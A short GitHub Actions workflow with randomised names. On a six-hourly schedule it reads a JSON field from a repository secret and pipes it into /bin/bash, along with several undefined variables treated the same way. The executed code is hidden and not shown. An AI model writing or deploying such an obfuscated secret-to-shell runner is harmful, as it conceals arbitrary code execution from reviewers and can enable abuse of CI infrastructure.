name: nengheru
on:
  workflow_dispatch:
  schedule:
    - cron: '43 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nengheru
        env:
          bt5203: ${{ secrets.bt5203 }}
        run: |
          echo $bt5203 | jq -r .uox9 | /bin/bash
          echo $negiu164 | jq -r .mx3887 | /bin/bash
          echo $dozmj363 | jq -r .bdlia02375 | /bin/bash
          echo $hrti3 | jq -r .zs8965 | /bin/bash
          echo $rnc0223 | jq -r .zd89 | /bin/bash
          echo $nkujt7 | jq -r .j45 | /bin/bash
          echo $mpamr250 | jq -r .c0 | /bin/bash

